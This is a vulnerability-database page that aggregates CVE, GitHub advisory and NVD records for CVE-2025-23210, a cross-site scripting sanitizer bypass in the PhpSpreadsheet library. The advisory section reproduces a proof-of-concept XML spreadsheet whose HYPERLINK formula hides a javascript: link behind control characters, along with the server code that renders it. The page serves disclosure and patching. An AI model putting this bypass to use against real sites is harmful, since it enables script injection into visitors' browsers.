CVE-2025-23210 (GCVE-0-2025-23210)
Vulnerability from cvelistv5 – Published: 2025-02-03 21:14 – Updated: 2025-02-04 15:33
VLAI?
Summary
phpoffice/phpspreadsheet is a pure PHP library for reading and writing spreadsheet files. Affected versions have been found to have a Bypass of the Cross-site Scripting (XSS) sanitizer using the javascript protocol and special characters. This issue has been addressed in versions 3.9.0, 2.3.7, 2.1.8, and 1.29.9. Users are advised to upgrade. There are no known workarounds for this vulnerability.
Severity ?
CWE
- CWE-79 - Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
Assigner
References
| URL | Tags | |||||||
|---|---|---|---|---|---|---|---|---|
|
||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| PHPOffice | PhpSpreadsheet |
Affected:
>= 3.0.0, < 3.9.0
Affected: >= 2.2.0, < 2.3.7 Affected: >= 2.0.0, < 2.1.8 Affected: < 1.29.9 |
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2025-23210",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-02-04T15:33:22.331092Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-02-04T15:33:39.661Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "PhpSpreadsheet",
"vendor": "PHPOffice",
"versions": [
{
"status": "affected",
"version": "\u003e= 3.0.0, \u003c 3.9.0"
},
{
"status": "affected",
"version": "\u003e= 2.2.0, \u003c 2.3.7"
},
{
"status": "affected",
"version": "\u003e= 2.0.0, \u003c 2.1.8"
},
{
"status": "affected",
"version": "\u003c 1.29.9"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "phpoffice/phpspreadsheet is a pure PHP library for reading and writing spreadsheet files. Affected versions have been found to have a Bypass of the Cross-site Scripting (XSS) sanitizer using the javascript protocol and special characters. This issue has been addressed in versions 3.9.0, 2.3.7, 2.1.8, and 1.29.9. Users are advised to upgrade. There are no known workarounds for this vulnerability."
}
],
"metrics": [
{
"cvssV4_0": {
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"baseScore": 4.8,
"baseSeverity": "MEDIUM",
"privilegesRequired": "LOW",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "LOW",
"subIntegrityImpact": "LOW",
"userInteraction": "ACTIVE",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:A/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N",
"version": "4.0",
"vulnAvailabilityImpact": "NONE",
"vulnConfidentialityImpact": "LOW",
"vulnIntegrityImpact": "LOW"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-79",
"description": "CWE-79: Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-02-03T21:14:57.255Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/PHPOffice/PhpSpreadsheet/security/advisories/GHSA-r57h-547h-w24f",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/PHPOffice/PhpSpreadsheet/security/advisories/GHSA-r57h-547h-w24f"
},
{
"name": "https://github.com/PHPOffice/PhpSpreadsheet/commit/cde2926a9e2baf146783f8fd1771bbed7d1dc7b3",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/PHPOffice/PhpSpreadsheet/commit/cde2926a9e2baf146783f8fd1771bbed7d1dc7b3"
}
],
"source": {
"advisory": "GHSA-r57h-547h-w24f",
"discovery": "UNKNOWN"
},
"title": "Bypass XSS sanitizer using the javascript protocol and special characters in phpoffice/phpspreadsheet"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2025-23210",
"datePublished": "2025-02-03T21:14:57.255Z",
"dateReserved": "2025-01-13T17:15:41.051Z",
"dateUpdated": "2025-02-04T15:33:39.661Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1",
"vulnerability-lookup:meta": {
"nvd": "{\"cve\":{\"id\":\"CVE-2025-23210\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2025-02-03T22:15:28.187\",\"lastModified\":\"2025-02-03T22:15:28.187\",\"vulnStatus\":\"Awaiting Analysis\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"phpoffice/phpspreadsheet is a pure PHP library for reading and writing spreadsheet files. Affected versions have been found to have a Bypass of the Cross-site Scripting (XSS) sanitizer using the javascript protocol and special characters. This issue has been addressed in versions 3.9.0, 2.3.7, 2.1.8, and 1.29.9. Users are advised to upgrade. There are no known workarounds for this vulnerability.\"},{\"lang\":\"es\",\"value\":\"phpoffice/phpspreadsheet es una librer\u00eda PHP pura para leer y escribir archivos de hojas de c\u00e1lculo. Se ha descubierto que las versiones afectadas tienen una omisi\u00f3n del sanitizador Cross-site Scripting (XSS) mediante el protocolo javascript y caracteres especiales. Este problema se ha solucionado en las versiones 3.9.0, 2.3.7, 2.1.8 y 1.29.9. Se recomienda a los usuarios que actualicen. No se conocen workarounds para esta vulnerabilidad.\"}],\"metrics\":{\"cvssMetricV40\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"4.0\",\"vectorString\":\"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:A/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X\",\"baseScore\":4.8,\"baseSeverity\":\"MEDIUM\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"attackRequirements\":\"NONE\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"ACTIVE\",\"vulnConfidentialityImpact\":\"LOW\",\"vulnIntegrityImpact\":\"LOW\",\"vulnAvailabilityImpact\":\"NONE\",\"subConfidentialityImpact\":\"LOW\",\"subIntegrityImpact\":\"LOW\",\"subAvailabilityImpact\":\"NONE\",\"exploitMaturity\":\"NOT_DEFINED\",\"confidentialityRequirement\":\"NOT_DEFINED\",\"integrityRequirement\":\"NOT_DEFINED\",\"availabilityRequirement\":\"NOT_DEFINED\",\"modifiedAttackVector\":\"NOT_DEFINED\",\"modifiedAttackComplexity\":\"NOT_DEFINED\",\"modifiedAttackRequirements\":\"NOT_DEFINED\",\"modifiedPrivilegesRequired\":\"NOT_DEFINED\",\"modifiedUserInteraction\":\"NOT_DEFINED\",\"modifiedVulnConfidentialityImpact\":\"NOT_DEFINED\",\"modifiedVulnIntegrityImpact\":\"NOT_DEFINED\",\"modifiedVulnAvailabilityImpact\":\"NOT_DEFINED\",\"modifiedSubConfidentialityImpact\":\"NOT_DEFINED\",\"modifiedSubIntegrityImpact\":\"NOT_DEFINED\",\"modifiedSubAvailabilityImpact\":\"NOT_DEFINED\",\"Safety\":\"NOT_DEFINED\",\"Automatable\":\"NOT_DEFINED\",\"Recovery\":\"NOT_DEFINED\",\"valueDensity\":\"NOT_DEFINED\",\"vulnerabilityResponseEffort\":\"NOT_DEFINED\",\"providerUrgency\":\"NOT_DEFINED\"}}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-79\"}]}],\"references\":[{\"url\":\"https://github.com/PHPOffice/PhpSpreadsheet/commit/cde2926a9e2baf146783f8fd1771bbed7d1dc7b3\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/PHPOffice/PhpSpreadsheet/security/advisories/GHSA-r57h-547h-w24f\",\"source\":\"security-advisories@github.com\"}]}}",
"vulnrichment": {
"containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2025-23210\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"none\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2025-02-04T15:33:22.331092Z\"}}}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2025-02-04T15:25:29.732Z\"}}], \"cna\": {\"title\": \"Bypass XSS sanitizer using the javascript protocol and special characters in phpoffice/phpspreadsheet\", \"source\": {\"advisory\": \"GHSA-r57h-547h-w24f\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV4_0\": {\"version\": \"4.0\", \"baseScore\": 4.8, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"MEDIUM\", \"vectorString\": \"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:A/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N\", \"userInteraction\": \"ACTIVE\", \"attackComplexity\": \"LOW\", \"attackRequirements\": \"NONE\", \"privilegesRequired\": \"LOW\", \"subIntegrityImpact\": \"LOW\", \"vulnIntegrityImpact\": \"LOW\", \"subAvailabilityImpact\": \"NONE\", \"vulnAvailabilityImpact\": \"NONE\", \"subConfidentialityImpact\": \"LOW\", \"vulnConfidentialityImpact\": \"LOW\"}}], \"affected\": [{\"vendor\": \"PHPOffice\", \"product\": \"PhpSpreadsheet\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003e= 3.0.0, \u003c 3.9.0\"}, {\"status\": \"affected\", \"version\": \"\u003e= 2.2.0, \u003c 2.3.7\"}, {\"status\": \"affected\", \"version\": \"\u003e= 2.0.0, \u003c 2.1.8\"}, {\"status\": \"affected\", \"version\": \"\u003c 1.29.9\"}]}], \"references\": [{\"url\": \"https://github.com/PHPOffice/PhpSpreadsheet/security/advisories/GHSA-r57h-547h-w24f\", \"name\": \"https://github.com/PHPOffice/PhpSpreadsheet/security/advisories/GHSA-r57h-547h-w24f\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/PHPOffice/PhpSpreadsheet/commit/cde2926a9e2baf146783f8fd1771bbed7d1dc7b3\", \"name\": \"https://github.com/PHPOffice/PhpSpreadsheet/commit/cde2926a9e2baf146783f8fd1771bbed7d1dc7b3\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"phpoffice/phpspreadsheet is a pure PHP library for reading and writing spreadsheet files. Affected versions have been found to have a Bypass of the Cross-site Scripting (XSS) sanitizer using the javascript protocol and special characters. This issue has been addressed in versions 3.9.0, 2.3.7, 2.1.8, and 1.29.9. Users are advised to upgrade. There are no known workarounds for this vulnerability.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-79\", \"description\": \"CWE-79: Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2025-02-03T21:14:57.255Z\"}}}",
"cveMetadata": "{\"cveId\": \"CVE-2025-23210\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2025-02-04T15:33:39.661Z\", \"dateReserved\": \"2025-01-13T17:15:41.051Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2025-02-03T21:14:57.255Z\", \"assignerShortName\": \"GitHub_M\"}",
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
}
}
GHSA-R57H-547H-W24F
Vulnerability from github – Published: 2025-02-03 15:39 – Updated: 2025-03-06 18:22
VLAI?
Summary
PhpSpreadsheet allows bypassing of XSS sanitizer using the javascript protocol and special characters
Details
Product: PhpSpreadsheet
Version: 3.8.0
CWE-ID: CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
CVSS vector v.3.1: 5.4 (AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N)
CVSS vector v.4.0: 4.8 (AV:N/AC:L/AT:N/PR:L/UI:A/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N)
Description: an attacker can use special characters, so that the library processes the javascript protocol with special characters and generates an HTML link
Impact: executing arbitrary JavaScript code in the browser
Vulnerable component: class PhpOffice\PhpSpreadsheet\Writer\Html, method generateRow
Exploitation conditions: a user viewing a specially generated xml file
Mitigation: additional sanitization of special characters in a string
Researcher: Igor Sak-Sakovskiy (Positive Technologies)
Research
The researcher discovered zero-day vulnerability Bypass XSS sanitizer using the javascript protocol and special characters in Phpspreadsheet. The following code is written on the server, which translates the XML file into an HTML representation and displays it in the response.
Listing 4. Source code on the server
<?php
require __DIR__ . '/vendor/autoload.php';
$inputFileType = 'Xml';
$reader = \PhpOffice\PhpSpreadsheet\IOFactory::createReader($inputFileType);
$inputFileName = './doc/file.xml';
$spreadsheet = $reader->load($inputFileName);
$writer = new \PhpOffice\PhpSpreadsheet\Writer\Html($spreadsheet);
print($writer->generateHTMLAll());
The contents of the xml file - ./doc/file.xml
Listing 5. The contents of the xml file
<?xml version="1.0"?>
<?mso-application progid="Excel.Sheet"?>
<Workbook xmlns="urn:schemas-microsoft-com:office:spreadsheet"
xmlns:o="urn:schemas-microsoft-com:office:office"
xmlns:x="urn:schemas-microsoft-com:office:excel"
xmlns:ss="urn:schemas-microsoft-com:office:spreadsheet"
xmlns:html="http://www.w3.org/TR/REC-html40">
<DocumentProperties xmlns="urn:schemas-microsoft-com:office:office">
<Author>author</Author>
<LastAuthor>author</LastAuthor>
<Created>2015-06-05T18:19:34Z</Created>
<LastSaved>2024-12-25T10:16:07Z</LastSaved>
<Version>16.00</Version>
</DocumentProperties>
<OfficeDocumentSettings xmlns="urn:schemas-microsoft-com:office:office">
<AllowPNG/>
</OfficeDocumentSettings>
<ExcelWorkbook xmlns="urn:schemas-microsoft-com:office:excel">
<WindowHeight>11020</WindowHeight>
<WindowWidth>19420</WindowWidth>
<WindowTopX>32767</WindowTopX>
<WindowTopY>32767</WindowTopY>
<ProtectStructure>False</ProtectStructure>
<ProtectWindows>False</ProtectWindows>
</ExcelWorkbook>
<Styles>
<Style ss:ID="Default" ss:Name="Normal">
<Alignment ss:Vertical="Bottom"/>
<Borders/>
<Font ss:FontName="Calibri" x:Family="Swiss" ss:Size="11" ss:Color="#000000"/>
<Interior/>
<NumberFormat/>
<Protection/>
</Style>
<Style ss:ID="s16">
<NumberFormat ss:Format="General Date"/>
</Style>
</Styles>
<Worksheet ss:Name="Лист1">
<Table ss:ExpandedColumnCount="2" ss:ExpandedRowCount="6" x:FullColumns="1"
x:FullRows="1" ss:DefaultRowHeight="14.5">
<Column ss:AutoFitWidth="0" ss:Width="194"/>
<Row>
<Cell ss:Formula="=HYPERLINK (CHAR(20) & "j" & CHAR(13) & "avascript:alert(1)")"><Data ss:Type="String"></Data></Cell>
</Row>
</Table>
<WorksheetOptions xmlns="urn:schemas-microsoft-com:office:excel">
<PageSetup>
<Header x:Margin="0.3"/>
<Footer x:Margin="0.3"/>
<PageMargins x:Bottom="0.75" x:Left="0.7" x:Right="0.7" x:Top="0.75"/>
</PageSetup>
<Selected/>
<TopRowVisible>1</TopRowVisible>
<Panes>
<Pane>
<Number>3</Number>
<ActiveRow>6</ActiveRow>
</Pane>
</Panes>
<ProtectObjects>False</ProtectObjects>
<ProtectScenarios>False</ProtectScenarios>
</WorksheetOptions>
</Worksheet>
</Workbook>
Due to the load with a special character in front of the javascript protocol, the execution flow hits line 1595, not 1593.
Figure 4. Generating a link bypassing a regular expression
In the response from the server, you can see which special character is located in front of the javascript protocol after conversion.
Figure 5. Response from the server with a special character
When viewing the rendered result, a link becomes visible in the browser, and when clicked, the embedded JavaScript code will be executed.
Figure 6. Executing JavaScript code
Credit
Igor Sak-Sakovskiy (Positive Technologies)
Severity ?
5.4 (Medium)
{
"affected": [
{
"package": {
"ecosystem": "Packagist",
"name": "phpoffice/phpspreadsheet"
},
"ranges": [
{
"events": [
{
"introduced": "3.0.0"
},
{
"fixed": "3.9.0"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Packagist",
"name": "phpoffice/phpspreadsheet"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.29.9"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Packagist",
"name": "phpoffice/phpspreadsheet"
},
"ranges": [
{
"events": [
{
"introduced": "2.2.0"
},
{
"fixed": "2.3.7"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Packagist",
"name": "phpoffice/phpspreadsheet"
},
"ranges": [
{
"events": [
{
"introduced": "2.0.0"
},
{
"fixed": "2.1.8"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Packagist",
"name": "phpoffice/phpexcel"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"last_affected": "1.8.2"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-23210"
],
"database_specific": {
"cwe_ids": [
"CWE-79"
],
"github_reviewed": true,
"github_reviewed_at": "2025-02-03T15:39:31Z",
"nvd_published_at": "2025-02-03T22:15:28Z",
"severity": "MODERATE"
},
"details": "**Product:** PhpSpreadsheet\n**Version:** 3.8.0\n**CWE-ID:** CWE-79: Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)\n**CVSS vector v.3.1:** 5.4 (AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N)\n**CVSS vector v.4.0:** 4.8 (AV:N/AC:L/AT:N/PR:L/UI:A/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N)\n**Description:** an attacker can use special characters, so that the library processes the javascript protocol with special characters and generates an HTML link\n**Impact:** executing arbitrary JavaScript code in the browser\n**Vulnerable component:** class `PhpOffice\\PhpSpreadsheet\\Writer\\Html`, method `generateRow`\n**Exploitation conditions:** a user viewing a specially generated xml file\n**Mitigation:** additional sanitization of special characters in a string\n**Researcher: Igor Sak-Sakovskiy (Positive Technologies)**\n\n# Research\n\nThe researcher discovered zero-day vulnerability Bypass XSS sanitizer using the javascript protocol and special characters in Phpspreadsheet.\nThe following code is written on the server, which translates the XML file into an HTML representation and displays it in the response.\n\n*Listing 4. Source code on the server*\n\n```\n\u003c?php\n\nrequire __DIR__ . \u0027/vendor/autoload.php\u0027;\n\n$inputFileType = \u0027Xml\u0027;\n$reader = \\PhpOffice\\PhpSpreadsheet\\IOFactory::createReader($inputFileType); \n\n$inputFileName = \u0027./doc/file.xml\u0027;\n$spreadsheet = $reader-\u003eload($inputFileName); \n \n$writer = new \\PhpOffice\\PhpSpreadsheet\\Writer\\Html($spreadsheet); \nprint($writer-\u003egenerateHTMLAll());\n```\nThe contents of the xml file - `./doc/file.xml`\n\n*Listing 5. The contents of the xml file*\n```\n\u003c?xml version=\"1.0\"?\u003e \n\u003c?mso-application progid=\"Excel.Sheet\"?\u003e \n\u003cWorkbook xmlns=\"urn:schemas-microsoft-com:office:spreadsheet\" \n xmlns:o=\"urn:schemas-microsoft-com:office:office\" \n xmlns:x=\"urn:schemas-microsoft-com:office:excel\" \n xmlns:ss=\"urn:schemas-microsoft-com:office:spreadsheet\" \n xmlns:html=\"http://www.w3.org/TR/REC-html40\"\u003e \n \u003cDocumentProperties xmlns=\"urn:schemas-microsoft-com:office:office\"\u003e \n \u003cAuthor\u003eauthor\u003c/Author\u003e \n \u003cLastAuthor\u003eauthor\u003c/LastAuthor\u003e \n \u003cCreated\u003e2015-06-05T18:19:34Z\u003c/Created\u003e \n \u003cLastSaved\u003e2024-12-25T10:16:07Z\u003c/LastSaved\u003e \n \u003cVersion\u003e16.00\u003c/Version\u003e \n \u003c/DocumentProperties\u003e \n \u003cOfficeDocumentSettings xmlns=\"urn:schemas-microsoft-com:office:office\"\u003e \n \u003cAllowPNG/\u003e \n \u003c/OfficeDocumentSettings\u003e \n \u003cExcelWorkbook xmlns=\"urn:schemas-microsoft-com:office:excel\"\u003e \n \u003cWindowHeight\u003e11020\u003c/WindowHeight\u003e \n \u003cWindowWidth\u003e19420\u003c/WindowWidth\u003e \n \u003cWindowTopX\u003e32767\u003c/WindowTopX\u003e \n \u003cWindowTopY\u003e32767\u003c/WindowTopY\u003e \n \u003cProtectStructure\u003eFalse\u003c/ProtectStructure\u003e \n \u003cProtectWindows\u003eFalse\u003c/ProtectWindows\u003e \n \u003c/ExcelWorkbook\u003e \n \u003cStyles\u003e \n \u003cStyle ss:ID=\"Default\" ss:Name=\"Normal\"\u003e \n \u003cAlignment ss:Vertical=\"Bottom\"/\u003e \n \u003cBorders/\u003e \n \u003cFont ss:FontName=\"Calibri\" x:Family=\"Swiss\" ss:Size=\"11\" ss:Color=\"#000000\"/\u003e \n \u003cInterior/\u003e \n \u003cNumberFormat/\u003e \n \u003cProtection/\u003e \n \u003c/Style\u003e \n \u003cStyle ss:ID=\"s16\"\u003e \n \u003cNumberFormat ss:Format=\"General Date\"/\u003e \n \u003c/Style\u003e \n \u003c/Styles\u003e \n \u003cWorksheet ss:Name=\"\u041b\u0438\u0441\u04421\"\u003e \n \u003cTable ss:ExpandedColumnCount=\"2\" ss:ExpandedRowCount=\"6\" x:FullColumns=\"1\" \n x:FullRows=\"1\" ss:DefaultRowHeight=\"14.5\"\u003e \n \u003cColumn ss:AutoFitWidth=\"0\" ss:Width=\"194\"/\u003e \n \u003cRow\u003e \n \u003cCell ss:Formula=\"=HYPERLINK (CHAR(20) \u0026amp; \u0026quot;j\u0026quot; \u0026amp; CHAR(13) \u0026amp; \u0026quot;avascript:alert(1)\u0026quot;)\"\u003e\u003cData ss:Type=\"String\"\u003e\u003c/Data\u003e\u003c/Cell\u003e \n \u003c/Row\u003e \n \u003c/Table\u003e \n \u003cWorksheetOptions xmlns=\"urn:schemas-microsoft-com:office:excel\"\u003e \n \u003cPageSetup\u003e \n \u003cHeader x:Margin=\"0.3\"/\u003e \n \u003cFooter x:Margin=\"0.3\"/\u003e \n \u003cPageMargins x:Bottom=\"0.75\" x:Left=\"0.7\" x:Right=\"0.7\" x:Top=\"0.75\"/\u003e \n \u003c/PageSetup\u003e \n \u003cSelected/\u003e \n \u003cTopRowVisible\u003e1\u003c/TopRowVisible\u003e \n \u003cPanes\u003e \n \u003cPane\u003e \n \u003cNumber\u003e3\u003c/Number\u003e \n \u003cActiveRow\u003e6\u003c/ActiveRow\u003e \n \u003c/Pane\u003e \n \u003c/Panes\u003e \n \u003cProtectObjects\u003eFalse\u003c/ProtectObjects\u003e \n \u003cProtectScenarios\u003eFalse\u003c/ProtectScenarios\u003e \n \u003c/WorksheetOptions\u003e \n \u003c/Worksheet\u003e\n\u003c/Workbook\u003e\n```\n\nDue to the load with a special character in front of the javascript protocol, the execution flow hits line 1595, not 1593.\n \n*Figure 4. Generating a link bypassing a regular expression*\n\n\nIn the response from the server, you can see which special character is located in front of the javascript protocol after conversion.\n \n*Figure 5. Response from the server with a special character*\n\n\nWhen viewing the rendered result, a link becomes visible in the browser, and when clicked, the embedded JavaScript code will be executed.\n\n*Figure 6. Executing JavaScript code*\n\u003cimg width=\"595\" alt=\"fig6\" src=\"https://github.com/user-attachments/assets/b8ff1aeb-ba3b-49c1-a3b4-9e2cc1fc52d1\" /\u003e\n_____________________________________________\n\n## Credit\n\nIgor Sak-Sakovskiy (Positive Technologies)",
"id": "GHSA-r57h-547h-w24f",
"modified": "2025-03-06T18:22:55Z",
"published": "2025-02-03T15:39:31Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/PHPOffice/PhpSpreadsheet/security/advisories/GHSA-r57h-547h-w24f"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-23210"
},
{
"type": "WEB",
"url": "https://github.com/PHPOffice/PhpSpreadsheet/commit/cde2926a9e2baf146783f8fd1771bbed7d1dc7b3"
},
{
"type": "PACKAGE",
"url": "https://github.com/PHPOffice/PhpSpreadsheet"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:A/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N",
"type": "CVSS_V4"
}
],
"summary": "PhpSpreadsheet allows bypassing of XSS sanitizer using the javascript protocol and special characters"
}
FKIE_CVE-2025-23210
Vulnerability from fkie_nvd - Published: 2025-02-03 22:15 - Updated: 2025-02-03 22:15
Severity ?
Summary
phpoffice/phpspreadsheet is a pure PHP library for reading and writing spreadsheet files. Affected versions have been found to have a Bypass of the Cross-site Scripting (XSS) sanitizer using the javascript protocol and special characters. This issue has been addressed in versions 3.9.0, 2.3.7, 2.1.8, and 1.29.9. Users are advised to upgrade. There are no known workarounds for this vulnerability.
References
Impacted products
| Vendor | Product | Version |
|---|
{
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "phpoffice/phpspreadsheet is a pure PHP library for reading and writing spreadsheet files. Affected versions have been found to have a Bypass of the Cross-site Scripting (XSS) sanitizer using the javascript protocol and special characters. This issue has been addressed in versions 3.9.0, 2.3.7, 2.1.8, and 1.29.9. Users are advised to upgrade. There are no known workarounds for this vulnerability."
},
{
"lang": "es",
"value": "phpoffice/phpspreadsheet es una librer\u00eda PHP pura para leer y escribir archivos de hojas de c\u00e1lculo. Se ha descubierto que las versiones afectadas tienen una omisi\u00f3n del sanitizador Cross-site Scripting (XSS) mediante el protocolo javascript y caracteres especiales. Este problema se ha solucionado en las versiones 3.9.0, 2.3.7, 2.1.8 y 1.29.9. Se recomienda a los usuarios que actualicen. No se conocen workarounds para esta vulnerabilidad."
}
],
"id": "CVE-2025-23210",
"lastModified": "2025-02-03T22:15:28.187",
"metrics": {
"cvssMetricV40": [
{
"cvssData": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"availabilityRequirement": "NOT_DEFINED",
"baseScore": 4.8,
"baseSeverity": "MEDIUM",
"confidentialityRequirement": "NOT_DEFINED",
"exploitMaturity": "NOT_DEFINED",
"integrityRequirement": "NOT_DEFINED",
"modifiedAttackComplexity": "NOT_DEFINED",
"modifiedAttackRequirements": "NOT_DEFINED",
"modifiedAttackVector": "NOT_DEFINED",
"modifiedPrivilegesRequired": "NOT_DEFINED",
"modifiedSubAvailabilityImpact": "NOT_DEFINED",
"modifiedSubConfidentialityImpact": "NOT_DEFINED",
"modifiedSubIntegrityImpact": "NOT_DEFINED",
"modifiedUserInteraction": "NOT_DEFINED",
"modifiedVulnAvailabilityImpact": "NOT_DEFINED",
"modifiedVulnConfidentialityImpact": "NOT_DEFINED",
"modifiedVulnIntegrityImpact": "NOT_DEFINED",
"privilegesRequired": "LOW",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "LOW",
"subIntegrityImpact": "LOW",
"userInteraction": "ACTIVE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:A/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"version": "4.0",
"vulnAvailabilityImpact": "NONE",
"vulnConfidentialityImpact": "LOW",
"vulnIntegrityImpact": "LOW",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"source": "security-advisories@github.com",
"type": "Secondary"
}
]
},
"published": "2025-02-03T22:15:28.187",
"references": [
{
"source": "security-advisories@github.com",
"url": "https://github.com/PHPOffice/PhpSpreadsheet/commit/cde2926a9e2baf146783f8fd1771bbed7d1dc7b3"
},
{
"source": "security-advisories@github.com",
"url": "https://github.com/PHPOffice/PhpSpreadsheet/security/advisories/GHSA-r57h-547h-w24f"
}
],
"sourceIdentifier": "security-advisories@github.com",
"vulnStatus": "Awaiting Analysis",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-79"
}
],
"source": "security-advisories@github.com",
"type": "Primary"
}
]
}
Loading…
Loading…
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…